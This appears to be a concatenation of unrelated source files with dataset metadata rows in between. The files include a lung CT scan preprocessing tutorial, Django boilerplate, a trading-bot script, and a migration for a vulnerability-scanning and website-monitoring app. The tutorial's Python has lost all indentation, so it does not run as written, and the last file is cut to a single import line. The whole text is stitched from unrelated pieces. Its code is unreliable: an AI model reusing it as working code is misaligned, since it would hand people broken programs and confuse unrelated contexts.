first_patient = load_scan(INPUT_FOLDER + patients[0])
first_patient_pixels = get_pixels_hu(first_patient)
plt.hist(first_patient_pixels.flatten(), bins=80, color='c')
plt.xlabel("Hounsfield Units (HU)")
plt.ylabel("Frequency")
plt.show()
# Show some slice in the middle
plt.imshow(first_patient_pixels[80], cmap=plt.cm.gray)
plt.show()
# Looking at the table from Wikipedia and this histogram, we can clearly see which pixels are air and which are tissue. We will use this for lung segmentation in a bit :)
#
#
# ----------
# # Resampling
# A scan may have a pixel spacing of `[2.5, 0.5, 0.5]`, which means that the distance between slices is `2.5` millimeters. For a different scan this may be `[1.5, 0.725, 0.725]`, this can be problematic for automatic analysis (e.g. using ConvNets)!
#
# A common method of dealing with this is resampling the full dataset to a certain isotropic resolution. If we choose to resample everything to 1mm*1mm*1mm pixels we can use 3D convnets without worrying about learning zoom/slice thickness invariance.
#
# Whilst this may seem like a very simple step, it has quite some edge cases due to rounding. Also, it takes quite a while.
#
# Below code worked well for us (and deals with the edge cases):
# In[5]:
def resample(image, scan, new_spacing=[1,1,1]):
# Determine current pixel spacing
spacing = map(float, ([scan[0].SliceThickness] + scan[0].PixelSpacing))
spacing = np.array(list(spacing))
resize_factor = spacing / new_spacing
new_real_shape = image.shape * resize_factor
new_shape = np.round(new_real_shape)
real_resize_factor = new_shape / image.shape
new_spacing = spacing / real_resize_factor
image = scipy.ndimage.interpolation.zoom(image, real_resize_factor, mode='nearest')
return image, new_spacing
# Please note that when you apply this, to save the new spacing! Due to rounding this may be slightly off from the desired spacing (above script picks the best possible spacing with rounding).
#
# Let's resample our patient's pixels to an isomorphic resolution of 1 by 1 by 1 mm.
# In[6]:
pix_resampled, spacing = resample(first_patient_pixels, first_patient, [1,1,1])
print("Shape before resampling\t", first_patient_pixels.shape)
print("Shape after resampling\t", pix_resampled.shape)
# # 3D plotting the scan
# For visualization it is useful to be able to show a 3D image of the scan. Unfortunately, the packages available in this Kaggle docker image is very limited in this sense, so we will use marching cubes to create an approximate mesh for our 3D object, and plot this with matplotlib. Quite slow and ugly, but the best we can do.
# In[7]:
def plot_3d(image, threshold=-300):
# Position the scan upright,
# so the head of the patient would be at the top facing the camera
p = image.transpose(2,1,0)
verts, faces = measure.marching_cubes(p, threshold)
fig = plt.figure(figsize=(10, 10))
ax = fig.add_subplot(111, projection='3d')
# Fancy indexing: `verts[faces]` to generate a collection of triangles
mesh = Poly3DCollection(verts[faces], alpha=0.1)
face_color = [0.5, 0.5, 1]
mesh.set_facecolor(face_color)
ax.add_collection3d(mesh)
ax.set_xlim(0, p.shape[0])
ax.set_ylim(0, p.shape[1])
ax.set_zlim(0, p.shape[2])
plt.show()
# Our plot function takes a threshold argument which we can use to plot certain structures, such as all tissue or only the bones. 400 is a good threshold for showing the bones only (see Hounsfield unit table above). Let's do this!
# In[8]:
plot_3d(pix_resampled, 400)
# Spooky!
#
# # Lung segmentation
# In order to reduce the problem space, we can segment the lungs (and usually some tissue around it). The method that me and my student colleagues developed was quite effective.
#
# It involves quite a few smart steps. It consists of a series of applications of region growing and morphological operations. In this case, we will use only connected component analysis.
#
# The steps:
#
# * Threshold the image (-320 HU is a good threshold, but it doesn't matter much for this approach)
# * Do connected components, determine label of air around person, fill this with 1s in the binary image
# * Optionally: For every axial slice in the scan, determine the largest solid connected component (the body+air around the person), and set others to 0. This fills the structures in the lungs in the mask.
# * Keep only the largest air pocket (the human body has other pockets of air here and there).
# In[9]:
def largest_label_volume(im, bg=-1):
vals, counts = np.unique(im, return_counts=True)
counts = counts[vals != bg]
vals = vals[vals != bg]
if len(counts) > 0:
return vals[np.argmax(counts)]
else:
return None
def segment_lung_mask(image, fill_lung_structures=True):
# not actually binary, but 1 and 2.
# 0 is treated as background, which we do not want
binary_image = np.array(image > -320, dtype=np.int8)+1
labels = measure.label(binary_image)
# Pick the pixel in the very corner to determine which label is air.
# Improvement: Pick multiple background labels from around the patient
# More resistant to "trays" on which the patient lays cutting the air
# around the person in half
background_label = labels[0,0,0]
#Fill the air around the person
binary_image[background_label == labels] = 2
# Method of filling the lung structures (that is superior to something like
# morphological closing)
if fill_lung_structures:
# For every slice we determine the largest solid structure
for i, axial_slice in enumerate(binary_image):
axial_slice = axial_slice - 1
labeling = measure.label(axial_slice)
l_max = largest_label_volume(labeling, bg=0)
if l_max is not None: #This slice contains some lung
binary_image[i][labeling != l_max] = 1
binary_image -= 1 #Make the image actual binary
binary_image = 1-binary_image # Invert it, lungs are now 1
# Remove other air pockets insided body
labels = measure.label(binary_image, background=0)
l_max = largest_label_volume(labels, bg=0)
if l_max is not None: # There are air pockets
binary_image[labels != l_max] = 0
return binary_image
# In[10]:
segmented_lungs = segment_lung_mask(pix_resampled, False)
segmented_lungs_fill = segment_lung_mask(pix_resampled, True)
# In[11]:
plot_3d(segmented_lungs, 0)
# Beautiful!
#
# But there's one thing we can fix, it is probably a good idea to include structures within the lung (as the nodules are solid), we do not only want to air in the lungs.
# In[12]:
plot_3d(segmented_lungs_fill, 0)
# That's better. Let's also visualize the difference between the two.
# In[13]:
plot_3d(segmented_lungs_fill - segmented_lungs, 0)
# Pretty cool, no?
#
# Anyway, when you want to use this mask, **remember to first apply a dilation morphological operation** on it (i.e. with a circular kernel). This expands the mask in all directions. The air + structures in the lung alone will not contain all nodules, in particular it will miss those that are stuck to the side of the lung, where they often appear! So expand the mask a little :)
#
# **This segmentation may fail for some edge cases**. It relies on the fact that the air outside the patient is not connected to the air in the lungs. If the patient has a [tracheostomy](https://en.wikipedia.org/wiki/Tracheotomy), this will not be the case, I do not know whether this is present in the dataset. Also, particulary noisy images (for instance due to a pacemaker in the image below) this method may also fail. Instead, the second largest air pocket in the body will be segmented. You can recognize this by checking the fraction of image that the mask corresponds to, which will be very small for this case. You can then first apply a morphological closing operation with a kernel a few mm in size to close these holes, after which it should work (or more simply, do not use the mask for this image).
#
# ![pacemaker example][1]
#
# # Normalization
# Our values currently range from -1024 to around 2000. Anything above 400 is not interesting to us, as these are simply bones with different radiodensity. A commonly used set of thresholds in the LUNA16 competition to normalize between are -1000 and 400. Here's some code you can use:
#
#
# [1]: http://i.imgur.com/po0eX1L.png
# In[14]:
MIN_BOUND = -1000.0
MAX_BOUND = 400.0
def normalize(image):
image = (image - MIN_BOUND) / (MAX_BOUND - MIN_BOUND)
image[image>1] = 1.
image[image<0] = 0.
return image
# # Zero centering
#
# As a final preprocessing step, it is advisory to zero center your data so that your mean value is 0. To do this you simply subtract the mean pixel value from all pixels.
#
# To determine this mean you simply average all images in the whole dataset. If that sounds like a lot of work, we found this to be around 0.25 in the LUNA16 competition.
#
# **Warning: Do not zero center with the mean per image (like is done in some kernels on here). The CT scanners are calibrated to return accurate HU measurements. There is no such thing as an image with lower contrast or brightness like in normal pictures.**
# In[15]:
PIXEL_MEAN = 0.25
def zero_center(image):
image = image - PIXEL_MEAN
return image
# # What's next?
#
# With these steps your images are ready for consumption by your CNN or other ML method :). You can do all these steps offline (one time and save the result), and I would advise you to do so and let it run overnight as it may take a long time.
#
# **Tip:** To save storage space, don't do normalization and zero centering beforehand, but do this online (during training, just after loading). If you don't do this yet, your image are int16's, which are smaller than float32s and easier to compress as well.
#
# **If this tutorial helped you at all, please upvote it and leave a comment :)**
| [
"[email protected]"
] | |
d55ebe60b8e0bcc0a970d6ad2f7b180ce8ffd6f3 | 6702a014d58a70808214f4ad0ce32aef11c106fe | /manage.py | ae7fa45b3669d123f62de0eb07941bf87d9f5b4f | [] | no_license | histuckyi/Django_tutorial | cb3373521b90d3505dc20abed3642aeb9a1e32ee | 3a63cfae2173e0e44701b23c2aca5f314228655f | refs/heads/master | 2020-06-11T06:17:00.400223 | 2019-06-26T10:12:49 | 2019-06-26T10:12:49 | 193,873,436 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 573 | py | #!/usr/bin/env python
import os
import sys
def main():
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'django_tutorial.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
fcaccd3bf997e4178ad0a6a92d0e8fd872093ed1 | e838ea567fe5216bd83b72d5cc549363a666ac3d | /registry/serializers/data_category.py | 1513f6a2ef2eb029d60b448425a25df85bfe014e | [] | no_license | iuriramos/swim-registry | f7ffee9a57b92021e7066820249092d1558a944d | 7c71d294b5aa7cb40e01ed559e2fcb81d2e1f43a | refs/heads/master | 2021-09-13T20:22:29.624535 | 2018-05-03T21:30:26 | 2018-05-03T21:30:26 | 85,312,675 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 396 | py | from registry.models.data_category import DataCategory
from rest_framework import serializers, viewsets
class DataCategorySerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = DataCategory
fields = ('pk', 'name', )
class DataCategoryViewSet(viewsets.ModelViewSet):
queryset = DataCategory.objects.all()
serializer_class = DataCategorySerializer
| [
"[email protected]"
] | |
084e8d38f2a41afdbacc05279be12f974947234b | b72f9d9f0769265cdea2b8caff145af9c532ea09 | /rcl_contest_2020_final/a.py | 8f28af7d879a8f73eacf82b2b20564e09dc9ba94 | [] | no_license | ritzcr/AtCoder | 3335fefa8fb1989a0f9da80fe6d0902b46aa2d1f | 15097b0c2568ace653e5080d789047531e50edde | refs/heads/master | 2021-02-12T19:16:41.757421 | 2020-07-05T06:30:57 | 2020-07-05T06:30:57 | 244,620,726 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 251 | py | N, M = map(int, input().split())
dice = [1, 2, 3, 4, 5, 6]
dice[0] = 6
output = " ".join(map(str, dice))
print(output)
for _ in range(M):
d, v, x = map(int, input().split())
dice[1] = 6
output = " ".join(map(str, dice))
print(output)
| [
"[email protected]"
] | |
019d0099a757ba400b6c6c8ff733026d56b60154 | 79e5a3733b261f11cf13526460c39d3d722744dd | /strawberry/types/datetime.py | 7abbf73d51ab32343b67f6c505b81f80fa1f7cc7 | [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | yngvarsh/strawberry | 73cc0e0a862dc4796549f925ac167ec6768d5ade | 96b8c701caaa0510e7118928e9e3c00d4ef5a05c | refs/heads/master | 2020-12-11T13:13:57.579007 | 2020-01-15T11:50:17 | 2020-01-15T11:50:17 | 233,857,471 | 0 | 0 | MIT | 2020-01-14T14:17:58 | 2020-01-14T14:17:57 | null | UTF-8 | Python | false | false | 663 | py | import datetime
import aniso8601
from ..custom_scalar import scalar
def _serialize_isoformatted(value):
return value.isoformat()
Date = scalar(
datetime.date,
name="Date",
description="Date (isoformat)",
serialize=_serialize_isoformatted,
parse_value=aniso8601.parse_date,
)
DateTime = scalar(
datetime.datetime,
name="DateTime",
description="Date with time (isoformat)",
serialize=_serialize_isoformatted,
parse_value=aniso8601.parse_datetime,
)
Time = scalar(
datetime.time,
name="Time",
description="Time (isoformat)",
serialize=_serialize_isoformatted,
parse_value=aniso8601.parse_time,
)
| [
"[email protected]"
] | |
bacb702adf0fd1d047d9ffe824ab720ad30d31ad | 2eaade99a8073faaf68c46eac48d8826b351fe17 | /main.py | 0ae913ee6b2c31ee876af199db61f9af08dd795d | [] | no_license | StevenMaharaj/traderv1 | 30ebb6f0242d986aace29ebc6e956bd78e68f02b | a1edab9722c2735302126d23ad1c9cd107152635 | refs/heads/main | 2023-07-22T21:56:37.266832 | 2021-09-08T05:34:50 | 2021-09-08T05:34:50 | 400,120,846 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,381 | py | from executionHandlers.execution import ExecutionHandler
from queue import Queue
from threading import Thread
from dataHandlers.deribit import DeribitTOB
import sys
from event import Event, SignalEvent
from accountHandlers.deribit import DeribitOrder
from executionHandlers.deribit import DeribitExecutionHandler
from datetime import datetime
from time import sleep
import argparse
import logging
import os
from Strategies.ScalperDeribit import scalper_deribit
from portfolio import Portfolio
log_folder = 'logs'
now: datetime = datetime.now()
now_string = datetime.strftime(now, '%y%m%d%H-%M-%S')
logging.basicConfig(filename=os.path.join(log_folder, f'{now_string}.log'),
level=logging.INFO, format='%(asctime)s %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p')
parser = argparse.ArgumentParser()
parser.add_argument("-l", "--isLive", help="Live trading or test")
args = parser.parse_args()
is_live: bool = eval(args.isLive)
if is_live:
print("This seesion will run live")
else:
print("This session is a test")
event_queue = Queue()
signal_event_queue = Queue()
portfolio = Portfolio({}, {})
deribit_scalper = scalper_deribit.Scalper(event_queue, signal_event_queue,
working_orders=5, portfolio=portfolio,
exchange='deribit',symbols=["BTC-PERPETUAL"], is_live=is_live,order_dist=20)
deribit_scalper.run()
| [
"="
] | = |
0c82b151fa1b84f52808f5d9cba3874637a21ab4 | 7e0f0662faee84f49794fb342199a59e570d4d15 | /env/bin/mako-render | 480cddd311d240ca506dd3dfdd95adb94f717789 | [] | no_license | Samkanja/headline | 03cfed21a21d71e91d9e37edf821c5d3d1a432c4 | be792d6ac7e23ba04fbcacbfec84ea659ba67e32 | refs/heads/master | 2023-06-19T14:01:21.431839 | 2021-07-08T13:28:37 | 2021-07-08T13:28:37 | 380,808,352 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 248 | #!/home/kskanja/stuff/down/headline/env/bin/python3.9
# -*- coding: utf-8 -*-
import re
import sys
from mako.cmd import cmdline
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(cmdline())
| [
"[email protected]"
] | ||
0adafa647dec796abb4b3232bac173145bced8c4 | c71c8dc74cc70b06c0c703ef409363496f95871e | /src/agents/migrations/0001_initial.py | f1028782e91e944b84f19f2fc9b109c26bd8daea | [] | no_license | l3h4ng/test1 | 76e882882f8f8a5e0f87088abff13eeac90f33f3 | 870583fdc6107e16abf04434d83c285f273215f3 | refs/heads/master | 2020-04-08T07:18:18.315397 | 2018-11-26T08:57:27 | 2018-11-26T08:57:27 | 159,134,139 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 20,451 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.6 on 2018-03-22 02:37
from __future__ import unicode_literals
import django.contrib.postgres.fields
import django.contrib.postgres.fields.jsonb
from django.db import migrations, models
import django.db.models.deletion
import time
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='CrawlDataModel',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('path', models.CharField(blank=True, max_length=250, null=True)),
('name', models.CharField(blank=True, max_length=150, null=True)),
('parent_id', models.IntegerField(blank=True, null=True)),
('loc_type', models.IntegerField(choices=[(0, 'file'), (1, 'folder')], default=0)),
('security_level', models.IntegerField(choices=[(0, 'safe'), (1, 'suspect'), (2, 'malware')], default=0)),
],
options={
'db_table': 'website_crawl_data',
},
),
migrations.CreateModel(
name='GoogleHackingKeywordModels',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', models.IntegerField(auto_created=True, default=time.time)),
('category', models.CharField(default='', max_length=250)),
('keyword', models.CharField(blank=True, default='', max_length=500)),
('google_search', models.CharField(blank=True, default='', max_length=500)),
('summary', models.CharField(blank=True, default='', max_length=500)),
],
options={
'db_table': 'google_hacking_db',
},
),
migrations.CreateModel(
name='HostServicesModel',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('ip_addr', models.CharField(blank=True, max_length=45, null=True)),
('name', models.CharField(blank=True, max_length=45, null=True)),
('port', models.IntegerField()),
('protocol', models.CharField(default='tcp', max_length=45)),
('state', models.CharField(default='open', max_length=45)),
('version', models.CharField(blank=True, max_length=150, null=True)),
],
options={
'db_table': 'host_services',
},
),
migrations.CreateModel(
name='HostsModel',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('ip_addr', models.CharField(max_length=250)),
('severity', models.IntegerField(default=1)),
('device_type', models.IntegerField(choices=[(0, 'general purpose'), (1, 'router'), (2, 'firewall'), (3, 'switch'), (4, 'printer'), (5, 'webcam'), (6, 'phone')], default=0)),
('status', models.IntegerField(default=0)),
('edges', django.contrib.postgres.fields.ArrayField(base_field=models.IntegerField(), blank=True, default=[], size=None)),
('edges_extend', django.contrib.postgres.fields.ArrayField(base_field=models.CharField(max_length=20), blank=True, default=[], size=None)),
],
options={
'db_table': 'hosts',
},
),
migrations.CreateModel(
name='HostVulnerabilityModel',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('detection_time', models.IntegerField(auto_created=True, blank=True, default=time.time)),
('name', models.TextField(blank=True, null=True)),
('is_fixed', models.BooleanField(default=False)),
('is_ignored', models.BooleanField(default=False)),
('attack_details', models.TextField(blank=True, default='', null=True)),
('port', models.CharField(blank=True, max_length=45, null=True)),
('request', models.TextField(blank=True, default='', null=True)),
('output', models.TextField(blank=True, default='', null=True)),
('affects', models.TextField(blank=True, null=True)),
('scanner_scan_id', models.CharField(default='', max_length=100)),
('scanner_vuln_id', models.CharField(default='', max_length=100)),
],
options={
'db_table': 'host_vulnerability',
},
),
migrations.CreateModel(
name='ScansModel',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('start_time', models.IntegerField(auto_created=True, default=time.time, editable=False)),
('percent', models.IntegerField(default=0)),
('status', models.IntegerField(choices=[(0, b'Kh\xe1\xbb\x9fi t\xe1\xba\xa1o'), (1, b'\xc4\x90ang ch\xe1\xbb\x9d qu\xc3\xa9t'), (2, b'\xc4\x90ang qu\xc3\xa9t'), (3, b'T\xe1\xba\xa1m d\xe1\xbb\xabng'), (4, b'Qu\xc3\xa9t l\xe1\xbb\x97i'), (5, b'Ho\xc3\xa0n th\xc3\xa0nh'), (6, b'Ho\xc3\xa0n th\xc3\xa0nh c\xc6\xa1 b\xe1\xba\xa3n')], default=0)),
('scripted_scan', django.contrib.postgres.fields.ArrayField(base_field=models.CharField(max_length=225), blank=True, default=[], size=None)),
('finish_time', models.IntegerField(null=True)),
],
options={
'db_table': 'scans',
},
),
migrations.CreateModel(
name='ServerConfigurationsModel',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.TextField(blank=True, null=True)),
('url', models.CharField(default='', max_length=500)),
('protocol', models.CharField(blank=True, default='', max_length=500)),
('description', models.TextField(blank=True, null=True)),
('ref', models.TextField(blank=True, null=True)),
],
options={
'db_table': 'server_configurations_vulnerability',
},
),
migrations.CreateModel(
name='WebsiteBlacklistCheckingModel',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('type', models.IntegerField(choices=[(0, 'GOOGLE SAFE BROWSING'), (1, 'NOTRTON SAFE WEB'), (2, 'PHISHTANK'), (3, 'OPERA BROWSER'), (4, 'SITEADVISOR'), (5, 'Sucuri Malware Labs'), (6, 'SpamHaus DBL'), (7, 'Yandex'), (8, 'ESET')], default=0)),
('result', models.IntegerField(choices=[(0, 'Clean'), (1, 'Warning')], default=0)),
],
options={
'db_table': 'website_blacklist_check',
},
),
migrations.CreateModel(
name='WebsiteContentModel',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('level', models.IntegerField(default=0)),
('tag', models.CharField(default='', max_length=50)),
('attrib', models.CharField(blank=True, default='', max_length=250)),
('content', models.TextField(blank=True, default='')),
('position', models.IntegerField(default=0)),
('children_counts', models.IntegerField(default=0)),
('crawler_time', models.IntegerField(default=0)),
('parent', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='agents.WebsiteContentModel')),
],
options={
'db_table': 'website_contents',
},
),
migrations.CreateModel(
name='WebsiteDatabasesModel',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('db_type', models.CharField(blank=True, max_length=45, null=True)),
('version', models.CharField(blank=True, max_length=45, null=True)),
('user', models.CharField(blank=True, max_length=45, null=True)),
('password', models.CharField(blank=True, max_length=45, null=True)),
('is_db_administrator', models.BooleanField(default=False)),
('databases', django.contrib.postgres.fields.jsonb.JSONField(default={})),
],
options={
'db_table': 'website_database',
},
),
migrations.CreateModel(
name='WebsiteGoogleHackingDetectModel',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('link', models.CharField(blank=True, default='', max_length=500)),
('total_results', models.IntegerField(blank=True, default=0)),
('results', django.contrib.postgres.fields.ArrayField(base_field=models.CharField(default='', max_length=500), blank=True, default=[], size=None)),
('keyword', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='websites', to='agents.GoogleHackingKeywordModels')),
],
options={
'db_table': 'website_ghdb_detect',
},
),
migrations.CreateModel(
name='WebsiteMonitorContentModel',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('new_content', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='newcontent', to='agents.WebsiteContentModel')),
('old_content', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='oldcontent', to='agents.WebsiteContentModel')),
],
options={
'db_table': 'website_monitor_content',
},
),
migrations.CreateModel(
name='WebsiteMonitorStatusModel',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('monitor_time', models.IntegerField(auto_created=True, blank=True, default=time.time, null=True)),
('ping_status', models.BooleanField(default=False)),
('ping_response', models.IntegerField(blank=True, default=0, max_length=10)),
('web_status', models.IntegerField(default=200, max_length=5)),
('web_load_response', models.IntegerField(blank=True, default=0, max_length=10)),
],
options={
'db_table': 'website_monitor_status',
},
),
migrations.CreateModel(
name='WebsiteMonitorUrl',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('url', models.CharField(default='', max_length=100)),
('path', models.CharField(default='', max_length=500)),
('is_enabled', models.BooleanField(default=True)),
('max_level', models.IntegerField(default=3)),
('is_training', models.BooleanField(default=True)),
('counts', models.IntegerField(default=0)),
],
options={
'db_table': 'website_monitor_urls',
},
),
migrations.CreateModel(
name='WebsitePhishingDomainDetectModel',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('domain', models.CharField(default='', max_length=250)),
('is_exits', models.BooleanField(default=False)),
('security_level', models.IntegerField(choices=[(0, 'safe'), (1, 'suspect'), (2, 'malware')], default=0)),
('ip_addr', models.CharField(blank=True, default='', max_length=500)),
],
options={
'db_table': 'website_phishing_alert',
},
),
migrations.CreateModel(
name='WebsiteSecurityAlertModel',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('category', models.IntegerField(choices=[(0, 'device'), (1, 'ip_addr'), (2, 'service'), (3, 'subdomain'), (4, 'path'), (5, 'vulnerablity')], default=0)),
('stauts', models.IntegerField(choices=[(0, 'new'), (1, 'deleted'), (2, 'modify')], default=0)),
('details', django.contrib.postgres.fields.jsonb.JSONField(default={})),
],
options={
'db_table': 'website_monitor_security',
},
),
migrations.CreateModel(
name='WebsiteStaticContentModel',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('content', models.TextField()),
('url_monitor', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='contents', to='agents.WebsiteMonitorUrl')),
],
options={
'db_table': 'website_static_contents',
},
),
migrations.CreateModel(
name='WebsiteSubdomainsModel',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('subdomain', models.CharField(max_length=200)),
('ip_addr', models.CharField(default='', max_length=200)),
('is_monitor', models.BooleanField(default=False)),
],
options={
'db_table': 'website_subdomains',
},
),
migrations.CreateModel(
name='WebsiteTechnologiesModel',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('technology', models.CharField(default='', max_length=200)),
('app', models.CharField(blank=True, default='', max_length=200)),
('version', models.CharField(blank=True, default='', max_length=20)),
],
options={
'db_table': 'website_technology',
},
),
migrations.CreateModel(
name='HostDetailsModel',
fields=[
('host', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, primary_key=True, related_name='details', serialize=False, to='agents.HostsModel')),
('hostname', models.CharField(blank=True, max_length=250, null=True)),
('os', django.contrib.postgres.fields.ArrayField(base_field=models.CharField(max_length=100), blank=True, default=[], size=None)),
('last_boot', models.CharField(blank=True, max_length=45, null=True)),
('mac_addr', models.CharField(blank=True, max_length=45, null=True)),
('ipv4', models.CharField(blank=True, max_length=45, null=True)),
('ipv6', models.CharField(blank=True, max_length=45, null=True)),
('vendor', models.CharField(blank=True, max_length=45, null=True)),
('status', models.CharField(blank=True, max_length=45, null=True)),
('state', models.CharField(blank=True, max_length=45, null=True)),
],
options={
'db_table': 'host_details',
},
),
migrations.CreateModel(
name='HostStatisticsModel',
fields=[
('host', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, primary_key=True, related_name='statistics', serialize=False, to='agents.HostsModel')),
('ip_addr', models.CharField(blank=True, max_length=45, null=True)),
('services_count', models.IntegerField(default=0)),
('subdomains_count', models.IntegerField(default=0)),
('paths_count', models.IntegerField(default=0)),
('server_configs_count', models.IntegerField(default=0)),
('db_attack_count', models.IntegerField(default=0)),
('vulns_count', models.IntegerField(default=0)),
('high_count', models.IntegerField(default=0)),
('medium_count', models.IntegerField(default=0)),
('low_count', models.IntegerField(default=0)),
('info_count', models.IntegerField(default=0)),
('critical_count', models.IntegerField(default=0)),
],
options={
'db_table': 'host_statistics',
},
),
migrations.AddField(
model_name='websitetechnologiesmodel',
name='website',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='technologies', to='agents.HostsModel'),
),
migrations.AddField(
model_name='websitesubdomainsmodel',
name='website',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='subdomains', to='agents.HostsModel'),
),
migrations.AddField(
model_name='websitesecurityalertmodel',
name='host',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='msecurities', to='agents.HostsModel'),
),
migrations.AddField(
model_name='websitephishingdomaindetectmodel',
name='website',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='phishing', to='agents.HostsModel'),
),
migrations.AlterUniqueTogether(
name='websitemonitorurl',
unique_together=set([('url', 'path')]),
),
migrations.AddField(
model_name='websitemonitorstatusmodel',
name='website',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='mstatus', to='agents.HostsModel'),
),
migrations.AddField(
model_name='websitemonitorcontentmodel',
name='url_monitor',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='mcontents', to='agents.WebsiteMonitorUrl'),
),
migrations.AddField(
model_name='websitegooglehackingdetectmodel',
name='website',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='ghdb', to='agents.HostsModel'),
),
migrations.AddField(
model_name='websitedatabasesmodel',
name='website',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='database', to='agents.HostsModel'),
),
migrations.AddField(
model_name='websitecontentmodel',
name='url_monitor',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='contents', to='agents.WebsiteMonitorUrl'),
),
migrations.AddField(
model_name='websiteblacklistcheckingmodel',
name='website',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='blacklist', to='agents.HostsModel'),
),
migrations.AddField(
model_name='serverconfigurationsmodel',
name='website',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='config_vulns', to='agents.HostsModel'),
),
]
| [
"[email protected]"
] | |
848cbab84018f841b970a1feb2b51d070c619871 | 2afc3ec1dae42403c2b208a21045e402636ca336 | /models.py | 28fa465795448218958b3af0e1a68d65f42181c9 | [] | no_license | Jagadishbommareddy/myapp | 6a5227f33ff5093eaf38f93ce9d69341e9ae6024 | 972b245c0fd33a4242ba17d3562f3e30acb20771 | refs/heads/master | 2021-01-22T13:52:49.093137 | 2017-08-18T09:14:59 | 2017-08-18T09:14:59 | 100,020,240 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,100 | py | from django.db import models
from .validators import *
class ContactInfo(models.Model):
mobile_no = models.CharField(max_length=15,validators=[validate_mobile_no])
phone_no = models.CharField(max_length=15, validators=[validate_phone_no])
email_id = models.EmailField(max_length=50)
class Address(models.Model):
address1 = models.CharField(max_length=50)
address2 = models.CharField(max_length=50)
city = models.CharField(max_length=20, validators=[validate_city])
state = models.CharField(max_length=20, validators=[validate_state])
landmark = models.CharField(max_length=50, validators=[validate_landmark])
pincode = models.CharField(max_length=10, validators=[validate_pincode])
class Customer(ContactInfo):
cuid = models.AutoField(primary_key=True)
first_name = models.CharField(max_length=15, validators=[validate_first_name])
last_name = models.CharField(max_length=15, validators=[validate_last_name])
age = models.CharField(max_length=2, validators=[validate_age])
Addresses = models.ManyToManyField("Address")
| [
"[email protected]"
] | |
e4eee8eb36da949a57ccfad7303d36932864ac6a | 496419c3802640fda626241b313d15499747c451 | /model_gravity_interactions.py | de84416634f6bd5a2ac930e9fbbc68dea580a9ac | [
"MIT"
] | permissive | simberaj/interactions | edf37bdf889f80e49032284621a2f0e38be99af8 | 8c7a29e97bc8f8d49901f6bdc406471f940c494e | refs/heads/master | 2021-01-17T13:13:14.414343 | 2016-05-28T12:13:29 | 2016-05-28T12:13:29 | 42,062,951 | 1 | 0 | null | 2015-09-22T14:24:35 | 2015-09-07T16:16:49 | Python | UTF-8 | Python | false | false | 2,739 | py | import arcpy, common, modeling, loaders
